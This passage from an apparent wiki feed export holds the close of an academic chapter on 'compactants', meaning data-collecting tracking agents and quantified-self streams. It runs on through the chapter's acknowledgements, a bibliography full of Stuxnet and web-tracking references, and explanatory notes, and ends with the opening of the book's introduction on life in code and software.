streams - albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also neatly expresses the sense of what web bugs and related technologies are. That is, compactants are interesting in terms of the distributed agency they enable, which can be understood through the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the 'future self' will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. I would also like to express my deepest thanks to Michael Najjar for the kind permission to use his work, 'The sublime brain [of Jonathon]', for the cover of the book which represents a neuronal frontal portait of an individual, for more of his excellent work please see [http://www.michaelnajjar.com]. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) 'Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;', ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) 'Stuxnet: Computer worm opens new era of warfare', ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) 'Activity Streams', accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) 'JSON Activity Streams 1.0', Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) 'Iran says Stuxnet virus infected 16,000 computers', ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) 'European Watchdog Pushes for Do Not Track Protocol', accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) 'Iran Confirms Stuxnet Worm Halted Centrifuges', ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) 'How Stuxnet Is Rewriting the Cyberterrorism Playbook', ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) 'Stuxnet Myrtus or MyRTUs?', accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) 'A Life Lived in Media', ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) 'Privacy Effects of Web Bugs Amplified by Web 2.0', in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) 'Counting every moment', ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) 'The Web Bug FAQ', accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) 'Duqu Trojan used 'unknown' programming language: Kaspersky', CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) 'How HP bugged e-mail', accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) 'How To Manufacture&amp;amp;nbsp;Desire', ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Frabetti, F. (2010) 'Critical Code Studies', accessed 15/03/2012, http://vimeo.com/16263212 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) 'Dunn grilled by Congress', accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) 'The Lifestreams Software Architecture', Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) 'Welcome to the Yale Lifestreams homepage!', accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) 'Americans Love Google! Americans Hate Google!', ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994) 'The cyber-road not taken.', ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) 'Time To Start Taking The Internet Seriously', ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) 'The Many Data Hats a Company can Wear', accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) 'Ghostrank Planetary System', accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) 'About Ghostery', accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) 'About ChartBeat', accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) 'Stuxnet/Duqu: The Evolution of Drivers', SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) 'A Declaration of Cyber-War', ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hall, G. (2011) ''Digitize Me, Visualize Me, Search Me'', Open Humanities Press, accessed 02/03/2012, http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) 'Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis', ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) ''New Stuxnet' worm targets companies in Europe', ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu '' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) 'Stuxnet opens cracks in Iran nuclear program', accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) 'Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon', accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2012) 'Display Advertising Technology Landscape', accessed 02/06/2012, http://www.lumapartners.com/resource-center/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) 'I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web', ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) 'In a Computer Worm, a Possible Biblical Clue', ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) 'Stuxnet Under the Microscope', accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) 'The Importance of Philosophy to Engineering', ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) 'User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web', Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) 'The Stuxnet Sting', accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Parikka, J. (2012) ''Medianatures: The Materiality of Information Technology and Electronic Waste'', Open Humanities Press, accessed 01/06/2012, http://www.livingbooksaboutlife.org/books/Medianatures &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Parry, D. (2011) ''Ubiquitous Surveillance'', Open Humanities Press, http://www.livingbooksaboutlife.org/books/Ubiquitous_Surveillance &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) 'Langner’s Stuxnet Deep Dive S4 Video', accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) 'Search Engine Use 2012', accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) 'So What Do We Do With All This Data?', _The Smithsonian_, accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sanger, D. E. (2012) Obama Order Sped Up Wave of Cyberattacks Against Iran, The New York Times, June 1, 2012, accessed 02/06/2012, http://www.nytimes.com/2012/06/01/world/middleeast/obama-ordered-wave-of-cyberattacks-against-iran.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) 'Feel. Act. Make sense', accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) 'Bad Habits? My Future Self Will Deal With That', accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wauters, R (2012) '427 million Europeans are now online, 37% uses more than one device: IAB', The Next Web, accessed 01/06/2012, http://thenextweb.com/eu/2012/05/31/427-million-europeans-are-now-online-37-uses-more-than-one-device-iab/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) 'Tracking Protection Working Group', accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) 'The Personal Analytics of My Life', accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) 'CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth', ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) 'Blockbuster Worm Aimed for Infrastructure', But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) 'Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant', ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies and Locally Stored Objects (LSOs) and document object model storage (DOM Storage) &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal, 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: 'Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity' (Ghostery, 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the internal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al., n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious. For instance, Cryptome (2010) argues: It may be that the 'myrtus' string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4996</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4996"/>
		<updated>2012-06-21T11:16:33Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology, made up of disparate software ecologies, that we inhabit. As such we need to take account of this new computational environment and think about how today we live in a highly mediated, code-based world. That is, we live in a world where computational concepts and ideas are foundational, or ontological. Here, code and software become the paradigmatic forms of knowing and doing - to the extent that other candidates for this role, such as air, the economy, evolution, the environment, satellites, and so forth, are understood and explained through computational concepts and categories.&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has been highly successful in penetrating more and more into the lifeworld. Digital code/software has created, and continues to create, specific tensions in relation to old media forms, such as the disruption it has produced in the print, music and film industries, as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. It is a potential that is understood as relating to the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate, often theorised as a form of network politics. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. For example, 427 million Europeans (or 65 percent) use the Internet and more than 9 in 10 European Internet users reading news online (Wauters, 2012). These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; These computational devices, particularly mobile forms, also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, 